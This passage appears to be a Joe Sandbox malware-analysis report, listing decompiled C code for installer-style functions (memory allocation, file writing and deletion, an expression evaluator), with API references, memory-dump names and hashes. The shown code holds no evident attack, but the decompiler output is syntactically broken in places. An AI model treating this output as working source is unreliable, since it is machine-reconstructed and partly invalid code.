                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                            • String ID: verifying installer: %d%%
                                                            • API String ID: 1451636040-82062127
                                                            • Opcode ID: 18484903bc97b0010b799efdcc2969c9f7184eca579189d06c0e917a59186ed5
                                                            • Instruction ID: d1e0a2a93c5684a536d9419adbf701d81bd0aa6c2e01a71bf08629b566d4acbd
                                                            • Opcode Fuzzy Hash: 18484903bc97b0010b799efdcc2969c9f7184eca579189d06c0e917a59186ed5
                                                            • Instruction Fuzzy Hash: 4A016270640209FBEF209F60DE09EAE3769EB04344F008039FA06B51D0DBB89955CF59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 73C31F58 Relevance: 9.1, APIs: 6, Instructions: 134memoryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 77%
                                                            			E73C31F58(void* _a4) {
				signed int _v4;
				signed int _v8;
				signed int _t46;
				void* _t47;
				signed int _t48;
				void* _t49;
				void* _t52;
				void* _t56;
				signed int _t57;
				signed int _t59;
				void* _t60;

				_t52 = _a4;
				_t46 = 0 |  *((intOrPtr*)(_t52 + 0x814)) > 0x00000000;
				while(1) {
					_v8 = _t46;
					_t59 = _t46 << 5;
					_t60 =  *(_t59 + _t52 + 0x830);
					if(_t60 == 0 || _t60 == 0x1a) {
						goto L8;
					}
					if(_t60 != 0xffffffff) {
						_t51 = _t60 - 1;
						if(_t60 - 1 > 0x18) {
							 *(_t59 + _t52 + 0x830) = 0x1a;
							L11:
							_t56 = _t59 + _t52;
							if( *((intOrPtr*)(_t59 + _t52 + 0x81c)) >= 0) {
							}
							_t48 =  *(_t59 + _t52 + 0x818) & 0x000000ff;
							 *(_t59 + _t52 + 0x834) =  *(_t59 + _t52 + 0x834) & 0x00000000;
							_v4 = _t48;
							if(_t48 > 7) {
								L28:
								_t49 = GlobalFree(_t60);
								_t57 = _v8;
								if(_t57 == 0) {
									return _t49;
								}
								_t43 = _t57 + 1; // 0x2
								_t55 =  !=  ? _t43 : 0;
								_t46 =  !=  ? _t43 : 0;
								continue;
							} else {
								switch( *((intOrPtr*)(_t48 * 4 +  &M73C32108))) {
									case 0:
										 *(_t56 + 0x820) =  *(_t56 + 0x820) & 0x00000000;
										goto L28;
									case 1:
										_push(__esi);
										__eax = E73C31326();
										_pop(__ecx);
										goto L18;
									case 2:
										_push(__esi);
										__eax = E73C31326();
										_pop(__ecx);
										 *__ebp = __eax;
										_a4 = __edx;
										goto L28;
									case 3:
										__eax = E73C312AF(__esi);
										goto L21;
									case 4:
										 *0x73c35040 =  *0x73c35040 +  *0x73c35040;
										__eax = GlobalAlloc(0x40,  *0x73c35040 +  *0x73c35040);
										__ecx =  *0x73c35040;
										_a4 = __eax;
										__eax = MultiByteToWideChar(0, 0, __esi,  *0x73c35040, __eax,  *0x73c35040);
										if(_v4 != 5) {
											__eax = _a4;
											L21:
											 *(__edi + __ebx + 0x834) = __eax;
											L18:
											 *__ebp = __eax;
											goto L28;
										}
										__eax = GlobalAlloc(0x40, 0x10);
										 *(__edi + __ebx + 0x834) = __eax;
										__edi = _a4;
										_push(__eax);
										_push(__edi);
										 *__ebp = __eax;
										__imp__CLSIDFromString();
										__eax = GlobalFree(__edi);
										goto L28;
									case 5:
										if( *__esi != 0) {
											_push(__esi);
											__eax = E73C31326();
											 *(__edi + __ebx + 0x820) = __eax;
										}
										goto L28;
									case 6:
										 *(__edi + __ebx + 0x830) =  *(__edi + __ebx + 0x830) - 1;
										__ecx = ( *(__edi + __ebx + 0x830) - 1) *  *0x73c35040;
										__ecx = ( *(__edi + __ebx + 0x830) - 1) *  *0x73c35040 +  *0x73c35038;
										_push(__ecx);
										__eax = __ecx + 0xc;
										 *(__edx + 0x820) = __eax;
										asm("cdq");
										_push(__edx);
										_push(__eax);
										__eax = E73C3144D(__ecx);
										__esp = __esp + 0xc;
										goto L28;
								}
							}
						}
						_t47 = E73C314E2(_t51);
						L9:
						L10:
						_t60 = _t47;
						goto L11;
					}
					_t47 = E73C3152B();
					goto L10;
					L8:
					_t47 = E73C312AF(0x73c340c7);
					goto L9;
				}
			}














                                                            0x73c31f5b
                                                            0x73c31f6a
                                                            0x73c31f6d
                                                            0x73c31f6f
                                                            0x73c31f73
                                                            0x73c31f76
                                                            0x73c31f7f
                                                            0x00000000
                                                            0x00000000
                                                            0x73c31f89
                                                            0x73c31f92
                                                            0x73c31f98
                                                            0x73c31fa2
                                                            0x73c31fbc
                                                            0x73c31fc4
                                                            0x73c31fc7
                                                            0x73c31fc7
                                                            0x73c31fd7
                                                            0x73c31fdf
                                                            0x73c31fe7
                                                            0x73c31fee
                                                            0x73c320dc
                                                            0x73c320dd
                                                            0x73c320e3
                                                            0x73c320e9
                                                            0x73c32106
                                                            0x73c32106
                                                            0x73c320ed
                                                            0x73c320f6
                                                            0x73c320f9
                                                            0x00000000
                                                            0x73c31ff4
                                                            0x73c31ff4
                                                            0x00000000
                                                            0x73c31ffb
                                                            0x00000000
                                                            0x00000000
                                                            0x73c32007
                                                            0x73c32008
                                                            0x73c3200d
                                                            0x00000000
                                                            0x00000000
                                                            0x73c32016
                                                            0x73c32017
                                                            0x73c3201c
                                                            0x73c3201d
                                                            0x73c32020
                                                            0x00000000
                                                            0x00000000
                                                            0x73c32029
                                                            0x00000000
                                                            0x00000000
                                                            0x73c3203d
                                                            0x73c32042
                                                            0x73c32048
                                                            0x73c32056
                                                            0x73c3205a
                                                            0x73c32065
                                                            0x73c32090
                                                            0x73c3202f
                                                            0x73c3202f
                                                            0x73c3200e
                                                            0x73c3200e
                                                            0x00000000
                                                            0x73c3200e
                                                            0x73c3206b
                                                            0x73c32071
                                                            0x73c32078
                                                            0x73c3207c
                                                            0x73c3207d
                                                            0x73c3207e
                                                            0x73c32081
                                                            0x73c32088
                                                            0x00000000
                                                            0x00000000
                                                            0x73c32099
                                                            0x73c3209b
                                                            0x73c3209c
                                                            0x73c320a9
                                                            0x73c320a9
                                                            0x00000000
                                                            0x00000000
                                                            0x73c320b9
                                                            0x73c320ba
                                                            0x73c320c1
                                                            0x73c320c7
                                                            0x73c320c8
                                                            0x73c320cb
                                                            0x73c320d1
                                                            0x73c320d2
                                                            0x73c320d3
                                                            0x73c320d4
                                                            0x73c320d9
                                                            0x00000000
                                                            0x00000000
                                                            0x73c31ff4
                                                            0x73c31fee
                                                            0x73c31f9b
                                                            0x73c31fb9
                                                            0x73c31fba
                                                            0x73c31fba
                                                            0x00000000
                                                            0x73c31fba
                                                            0x73c31f8b
                                                            0x00000000
                                                            0x73c31faf
                                                            0x73c31fb4
                                                            0x00000000
                                                            0x73c31fb4

                                                            APIs
                                                            • GlobalFree.KERNEL32(00000000), ref: 73C320DD
                                                              • Part of subcall function 73C312AF: lstrcpynA.KERNEL32(00000000,?,73C31502,?,73C311C4,-000000A0), ref: 73C312BF
                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 73C32042
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 73C3205A
                                                            • GlobalAlloc.KERNEL32(00000040,00000010), ref: 73C3206B
                                                            • CLSIDFromString.OLE32(00000000,00000000), ref: 73C32081
                                                            • GlobalFree.KERNEL32(00000000), ref: 73C32088
                                                              • Part of subcall function 73C31958: VirtualAlloc.KERNEL32(00000000,00000010,00001000,00000040,?,73C320A7,00000000,?), ref: 73C3198A
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1284018983.0000000073C31000.00000020.00000001.01000000.00000008.sdmp, Offset: 73C30000, based on PE: true
                                                            • Associated: 00000010.00000002.1284008674.0000000073C30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 00000010.00000002.1284039391.0000000073C34000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 00000010.00000002.1284051137.0000000073C36000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_73c30000_file.jbxd
                                                            Similarity
                                                            • API ID: Global$Alloc$Free$ByteCharFromMultiStringVirtualWidelstrcpyn
                                                            • String ID:
                                                            • API String ID: 506890080-0
                                                            • Opcode ID: fff02215b856c2c61ef98d6de7215268eba7eb4360f735ec0b033006ca5b5604
                                                            • Instruction ID: fb4f1f0e56d9a7ea952b0e042816662674f425aecbc62a75412af4237562892f
                                                            • Opcode Fuzzy Hash: fff02215b856c2c61ef98d6de7215268eba7eb4360f735ec0b033006ca5b5604
                                                            • Instruction Fuzzy Hash: C841C172505245EFD705FF25D844BEAB7E8FF46300F95822AE849CA18ADB316944CBE3
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004027E8 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 86%
                                                            			E004027E8(int __ebx) {
				CHAR* _t26;
				void* _t29;
				long _t37;
				int _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
				_t26 = E00402C39(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x78) = _t26;
				if(E00405C56(_t26) == 0) {
					E00402C39(0xffffffed);
				}
				E00405DC5(_t55);
				_t29 = E00405DEA(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0xc) =  *(_t61 - 0x24);
					if( *(_t61 - 0x20) != _t49) {
						_t37 =  *0x452434;
						 *(_t61 - 0x30) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E0040336B(_t49);
							E00403355(_t54,  *(_t61 - 0x30));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x20));
							 *(_t61 - 0x38) = _t59;
							if(_t59 != _t49) {
								E00403143( *(_t61 - 0x24), _t49, _t59,  *(_t61 - 0x20));
								while( *_t59 != _t49) {
									_t60 = _t59 + 8;
									 *(_t61 - 0x8c) =  *_t59;
									E00405DA5( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x8c);
								}
								GlobalFree( *(_t61 - 0x38));
							}
							E00405E91( *(_t61 + 8), _t54,  *(_t61 - 0x30));
							GlobalFree(_t54);
							 *(_t61 - 0xc) =  *(_t61 - 0xc) | 0xffffffff;
						}
					}
					_t52 = E00403143( *(_t61 - 0xc),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileA( *(_t61 - 0x78));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x4524a8 =  *0x4524a8 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}













                                                            0x004027e8
                                                            0x004027ea
                                                            0x004027ef
                                                            0x004027f4
                                                            0x004027f7
                                                            0x00402801
                                                            0x00402805
                                                            0x00402805
                                                            0x0040280b
                                                            0x00402818
                                                            0x00402820
                                                            0x00402823
                                                            0x0040282f
                                                            0x00402832
                                                            0x00402838
                                                            0x00402846
                                                            0x0040284b
                                                            0x0040284f
                                                            0x00402852
                                                            0x0040285b
                                                            0x00402867
                                                            0x0040286b
                                                            0x0040286e
                                                            0x00402878
                                                            0x0040289d
                                                            0x00402884
                                                            0x0040288c
                                                            0x00402892
                                                            0x00402897
                                                            0x00402897
                                                            0x004028a4
                                                            0x004028a4
                                                            0x004028b1
                                                            0x004028b7
                                                            0x004028bd
                                                            0x004028bd
                                                            0x0040284f
                                                            0x004028d1
                                                            0x004028d3
                                                            0x004028d3
                                                            0x004028dd
                                                            0x004028de
                                                            0x004028e2
                                                            0x004028e6
                                                            0x004028ec
                                                            0x004028ec
                                                            0x004028f3
                                                            0x004022e5
                                                            0x00402ac8
                                                            0x00402ad4

                                                            APIs
                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402849
                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402865
                                                            • GlobalFree.KERNEL32(?), ref: 004028A4
                                                            • GlobalFree.KERNEL32(00000000), ref: 004028B7
                                                            • CloseHandle.KERNEL32(?), ref: 004028D3
                                                            • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004028E6
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1283301112.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.1283280375.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283325225.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000041E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000042A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283348828.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000010.00000002.1283508181.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                            • String ID:
                                                            • API String ID: 2667972263-0
                                                            • Opcode ID: a3127964956f8a126563134f11b56d6a7ee8279a476d2f452480084297a57a74
                                                            • Instruction ID: 62dc5015629f04e2a446b0396b5ca5864e91704113ef4cf620f7a35519d741bb
                                                            • Opcode Fuzzy Hash: a3127964956f8a126563134f11b56d6a7ee8279a476d2f452480084297a57a74
                                                            • Instruction Fuzzy Hash: 4B31AD32800128BBDF207FA5DE88D9E7B79BF08324F14423AF454B62D1CB7989419B68
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 73C31C2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 199COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 88%
                                                            			E73C31C2B(signed int __edx, char _a8, void* _a16) {
				char _v8;
				char _v28;
				void* _v32;
				signed int _v36;
				signed int _v40;
				void* _t28;
				char _t31;
				char _t32;
				signed int _t33;
				signed int _t41;
				signed int _t42;
				signed int _t43;
				signed int _t44;
				signed int _t45;
				signed int _t46;
				signed int _t51;
				void* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;
				signed int _t63;
				char _t67;
				signed int _t70;
				signed int _t72;
				void* _t79;
				void* _t81;
				signed int _t83;
				signed int _t86;
				void* _t91;

				_t70 = __edx;
				asm("xorps xmm0, xmm0");
				 *0x73c35040 = _a8;
				 *0x73c3503c = _a16;
				asm("movlpd [esp+0x10], xmm0");
				_t28 = E73C3152B();
				_push(_t28);
				_v32 = _t28;
				_t72 = E73C31326();
				_t63 = _t70;
				_t79 = E73C3152B();
				_a16 = _t79;
				_t67 =  *_t79;
				_t31 = _t67;
				_a8 = _t31;
				if(_t67 == 0x7e) {
					L3:
					_t68 = _v36;
					_t83 = _v40;
					L4:
					_t32 = _t31;
					_t91 = _t32 - 0x2f;
					if(_t91 > 0) {
						_t33 = _t32 - 0x3c;
						__eflags = _t33;
						if(_t33 == 0) {
							__eflags =  *((char*)(_t79 + 1)) - 0x3c;
							if( *((char*)(_t79 + 1)) != 0x3c) {
								__eflags = _t63 - _t68;
								if(__eflags > 0) {
									L18:
									asm("xorps xmm0, xmm0");
									asm("movlpd [esp+0x10], xmm0");
									_t72 = _v40;
									_t63 = _v36;
									L19:
									_push( &_v28);
									_push(_t63);
									_push(_t72);
									E73C3144D(_t68);
									E73C3157E( &_v28);
									GlobalFree(_v32);
									return GlobalFree(_t79);
								}
								if(__eflags < 0) {
									L57:
									_t72 = 1;
									_t63 = 0;
									goto L19;
								}
								__eflags = _t72 - _t83;
								if(_t72 >= _t83) {
									goto L18;
								}
								goto L57;
							}
							_t70 = _t63;
							_t68 = _t83;
							_t41 = E73C33090(_t72, _t83, _t70);
							L53:
							_t72 = _t41;
							_t63 = _t70;
							goto L19;
						}
						_t42 = _t33 - 1;
						__eflags = _t42;
						if(_t42 == 0) {
							__eflags = _t72 - _t83;
							if(_t72 != _t83) {
								goto L18;
							}
							__eflags = _t63 - _t68;
							L22:
							if(__eflags != 0) {
								goto L18;
							}
							goto L57;
						}
						_t43 = _t42 - 1;
						__eflags = _t43;
						if(_t43 == 0) {
							__eflags =  *((char*)(_t79 + 1)) - 0x3e;
							if( *((char*)(_t79 + 1)) != 0x3e) {
								__eflags = _t63 - _t68;
								if(__eflags < 0) {
									goto L18;
								}
								if(__eflags > 0) {
									goto L57;
								}
								__eflags = _t72 - _t83;
								if(_t72 <= _t83) {
									goto L18;
								}
								goto L57;
							}
							__eflags =  *((char*)(_t79 + 2)) - 0x3e;
							_t44 = _t72;
							_t70 = _t63;
							_t68 = _t83;
							if( *((char*)(_t79 + 2)) != 0x3e) {
								_t41 = E73C330B0(_t44, _t68, _t70);
							} else {
								_t41 = E73C330E0(_t44, _t68, _t70);
							}
							goto L53;
						}
						_t45 = _t43 - 0x20;
						__eflags = _t45;
						if(_t45 == 0) {
							_t72 = _t72 ^ _t83;
							_t63 = _t63 ^ _t68;
							goto L19;
						}
						_t46 = _t45 - 0x1e;
						__eflags = _t46;
						if(_t46 == 0) {
							__eflags =  *((char*)(_t79 + 1)) - 0x7c;
							if( *((char*)(_t79 + 1)) != 0x7c) {
								_t72 = _t72 | _t83;
								_t63 = _t63 | _t68;
								goto L19;
							}
							__eflags = _t72 | _t63;
							if((_t72 | _t63) != 0) {
								goto L57;
							}
							L17:
							__eflags = _t83 | _t68;
							if((_t83 | _t68) != 0) {
								goto L57;
							}
							goto L18;
						}
						__eflags = _t46 == 0;
						if(_t46 == 0) {
							_t72 =  !_t72;
							_t63 =  !_t63;
						}
						goto L19;
					}
					if(_t91 == 0) {
						L24:
						__eflags = _t83 | _t68;
						if((_t83 | _t68) != 0) {
							_push(_t68);
							_push(_t83);
							_push(_t63);
							_push(_t72);
							_t51 = E73C32FB0();
							_t86 = _t63;
							_t72 = _t51;
							_t63 = _t70;
						} else {
							asm("xorps xmm0, xmm0");
							_t68 = _t72;
							asm("movlpd [esp+0x10], xmm0");
							_t86 = _t63;
							_t63 = _v36;
							_t72 = _v40;
						}
						__eflags = _v8 - 0x2f;
						if(_v8 != 0x2f) {
							_t72 = _t68;
							_t63 = _t86;
						}
						goto L19;
					}
					_t52 = _t32 - 0x21;
					if(_t52 == 0) {
						__eflags = _t72 | _t63;
						goto L22;
					}
					_t53 = _t52 - 4;
					if(_t53 == 0) {
						goto L24;
					}
					_t54 = _t53 - 1;
					if(_t54 == 0) {
						__eflags =  *((char*)(_t79 + 1)) - 0x26;
						if( *((char*)(_t79 + 1)) != 0x26) {
							_t72 = _t72 & _t83;
							_t63 = _t63 & _t68;
							goto L19;
						}
						__eflags = _t72 | _t63;
						if((_t72 | _t63) == 0) {
							goto L18;
						}
						goto L17;
					}
					_t55 = _t54 - 4;
					if(_t55 == 0) {
						_t41 = E73C32ED0(_t72, _t63, _t83, _t68);
						goto L53;
					} else {
						_t56 = _t55 - 1;
						if(_t56 == 0) {
							_t72 = _t72 + _t83;
							asm("adc ebx, ecx");
						} else {
							if(_t56 == 0) {
								_t72 = _t72 - _t83;
								asm("sbb ebx, ecx");
							}
						}
						goto L19;
					}
				}
				_a8 = _t67;
				if(_t67 == 0x21) {
					goto L3;
				} else {
					_t81 = E73C3152B();
					_push(_t81);
					_t83 = E73C31326();
					_v40 = _t70;
					GlobalFree(_t81);
					_t79 = _a16;
					_t68 = _v40;
					_t31 =  *_t79;
					_a8 = _t31;
					goto L4;
				}
			}

































                                                            0x73c31c2b
                                                            0x73c31c32
                                                            0x73c31c38
                                                            0x73c31c42
                                                            0x73c31c47
                                                            0x73c31c4d
                                                            0x73c31c52
                                                            0x73c31c53
                                                            0x73c31c5d
                                                            0x73c31c5f
                                                            0x73c31c66
                                                            0x73c31c68
                                                            0x73c31c6c
                                                            0x73c31c6e
                                                            0x73c31c70
                                                            0x73c31c77
                                                            0x73c31cad
                                                            0x73c31cad
                                                            0x73c31cb1
                                                            0x73c31cb5
                                                            0x73c31cb5
                                                            0x73c31cb8
                                                            0x73c31cbb
                                                            0x73c31da3
                                                            0x73c31da3
                                                            0x73c31da6
                                                            0x73c31e3b
                                                            0x73c31e3f
                                                            0x73c31e55
                                                            0x73c31e57
                                                            0x73c31d1a
                                                            0x73c31d1a
                                                            0x73c31d1d
                                                            0x73c31d23
                                                            0x73c31d27
                                                            0x73c31d2b
                                                            0x73c31d2f
                                                            0x73c31d30
                                                            0x73c31d31
                                                            0x73c31d32
                                                            0x73c31d3c
                                                            0x73c31d4e
                                                            0x73c31d5a
                                                            0x73c31d5a
                                                            0x73c31e5d
                                                            0x73c31e67
                                                            0x73c31e69
                                                            0x73c31e6a
                                                            0x00000000
                                                            0x73c31e6a
                                                            0x73c31e5f
                                                            0x73c31e61
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x73c31e61
                                                            0x73c31e43
                                                            0x73c31e45
                                                            0x73c31e47
                                                            0x73c31e4c
                                                            0x73c31e4c
                                                            0x73c31e4e
                                                            0x00000000
                                                            0x73c31e4e
                                                            0x73c31dac
                                                            0x73c31dac
                                                            0x73c31daf
                                                            0x73c31e2c
                                                            0x73c31e2e
                                                            0x00000000
                                                            0x00000000
                                                            0x73c31e34
                                                            0x73c31d63
                                                            0x73c31d63
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x73c31d65
                                                            0x73c31db1
                                                            0x73c31db1
                                                            0x73c31db4
                                                            0x73c31df8
                                                            0x73c31dfc
                                                            0x73c31e18
                                                            0x73c31e1a
                                                            0x00000000
                                                            0x00000000
                                                            0x73c31e20
                                                            0x00000000
                                                            0x00000000
                                                            0x73c31e22
                                                            0x73c31e24
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x73c31e2a
                                                            0x73c31dfe
                                                            0x73c31e02
                                                            0x73c31e04
                                                            0x73c31e06
                                                            0x73c31e08
                                                            0x73c31e11
                                                            0x73c31e0a
                                                            0x73c31e0a
                                                            0x73c31e0a
                                                            0x00000000
                                                            0x73c31e08
                                                            0x73c31db6
                                                            0x73c31db6
                                                            0x73c31db9
                                                            0x73c31def
                                                            0x73c31df1
                                                            0x00000000
                                                            0x73c31df1
                                                            0x73c31dbb
                                                            0x73c31dbb
                                                            0x73c31dbe
                                                            0x73c31dd3
                                                            0x73c31dd7
                                                            0x73c31de6
                                                            0x73c31de8
                                                            0x00000000
                                                            0x73c31de8
                                                            0x73c31dd9
                                                            0x73c31ddb
                                                            0x00000000
                                                            0x00000000
                                                            0x73c31d12
                                                            0x73c31d12
                                                            0x73c31d14
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x73c31d14
                                                            0x73c31dc1
                                                            0x73c31dc4
                                                            0x73c31dca
                                                            0x73c31dcc
                                                            0x73c31dcc
                                                            0x00000000
                                                            0x73c31dc4
                                                            0x73c31cc1
                                                            0x73c31d6a
                                                            0x73c31d6c
                                                            0x73c31d6e
                                                            0x73c31d87
                                                            0x73c31d88
                                                            0x73c31d89
                                                            0x73c31d8a
                                                            0x73c31d8b
                                                            0x73c31d90
                                                            0x73c31d92
                                                            0x73c31d94
                                                            0x73c31d70
                                                            0x73c31d70
                                                            0x73c31d73
                                                            0x73c31d75
                                                            0x73c31d7b
                                                            0x73c31d7d
                                                            0x73c31d81
                                                            0x73c31d81
                                                            0x73c31d96
                                                            0x73c31d9b
                                                            0x73c31d9d
                                                            0x73c31d9f
                                                            0x73c31d9f
                                                            0x00000000
                                                            0x73c31d9b
                                                            0x73c31cc7
                                                            0x73c31cca
                                                            0x73c31d61
                                                            0x00000000
                                                            0x73c31d61
                                                            0x73c31cd0
                                                            0x73c31cd3
                                                            0x00000000
                                                            0x00000000
                                                            0x73c31cd9
                                                            0x73c31cdc
                                                            0x73c31d08
                                                            0x73c31d0c
                                                            0x73c31d5b
                                                            0x73c31d5d
                                                            0x00000000
                                                            0x73c31d5d
                                                            0x73c31d0e
                                                            0x73c31d10
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x73c31d10
                                                            0x73c31cde
                                                            0x73c31ce1
                                                            0x73c31cfe
                                                            0x00000000
                                                            0x73c31ce3
                                                            0x73c31ce3
                                                            0x73c31ce6
                                                            0x73c31cf4
                                                            0x73c31cf6
                                                            0x73c31ce8
                                                            0x73c31cec
                                                            0x73c31cee
                                                            0x73c31cf0
                                                            0x73c31cf0
                                                            0x73c31cec
                                                            0x00000000
                                                            0x73c31ce6
                                                            0x73c31ce1
                                                            0x73c31c79
                                                            0x73c31c80
                                                            0x00000000
                                                            0x73c31c82
                                                            0x73c31c87
                                                            0x73c31c89
                                                            0x73c31c91
                                                            0x73c31c93
                                                            0x73c31c97
                                                            0x73c31c9d
                                                            0x73c31ca1
                                                            0x73c31ca5
                                                            0x73c31ca7
                                                            0x00000000
                                                            0x73c31ca7

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.1284018983.0000000073C31000.00000020.00000001.01000000.00000008.sdmp, Offset: 73C30000, based on PE: true
                                                            • Associated: 00000010.00000002.1284008674.0000000073C30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 00000010.00000002.1284039391.0000000073C34000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            • Associated: 00000010.00000002.1284051137.0000000073C36000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_73c30000_file.jbxd
                                                            Similarity
                                                            • API ID: FreeGlobal$__alldvrm
                                                            • String ID: /
                                                            • API String ID: 482422042-2043925204
                                                            • Opcode ID: 734990d7883756d483f89d6cf6aaef45f0806f4adf628cee31855929cec1b8ca
                                                            • Instruction ID: 03189252ffe0b0ab82e4dcadd6881e4d01207493d63aa9d721ea299232752516
                                                            • Opcode Fuzzy Hash: 734990d7883756d483f89d6cf6aaef45f0806f4adf628cee31855929cec1b8ca
                                                            • Instruction Fuzzy Hash: EC510772A093854FE313BE7689C433A7AFAAB8B110FDA052DE142C7244D6A2D8464353
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 73C310C6 Relevance: 8.9, APIs: 7, Instructions: 155memoryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E73C310C6(void* _a8, intOrPtr _a12, void* _a16, intOrPtr _a20) {
				signed int _v0;
				void _t29;
				void* _t30;
				void* _t36;
				void* _t43;
				intOrPtr _t52;
				void* _t56;
				void* _t62;
				void* _t63;
				void _t66;
				void* _t67;
				void* _t74;
				signed int _t75;
				void* _t79;
				void* _t80;
				void* _t82;
				signed int _t83;
				void* _t85;
				void _t88;
				void _t89;
				void* _t90;
				void* _t92;
				void* _t94;

				 *0x73c35040 = _a8;
				 *0x73c3503c = _a16;
				 *0x73c35038 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x73c35014, E73C312F7, _t79, _t82);
				_t83 =  *0x73c35040 * 0x14;
				_v0 = _t83;
				_t90 = E73C3152B();
				_a8 = _t90;
				_t80 = _t90;
				_t66 = _v0;
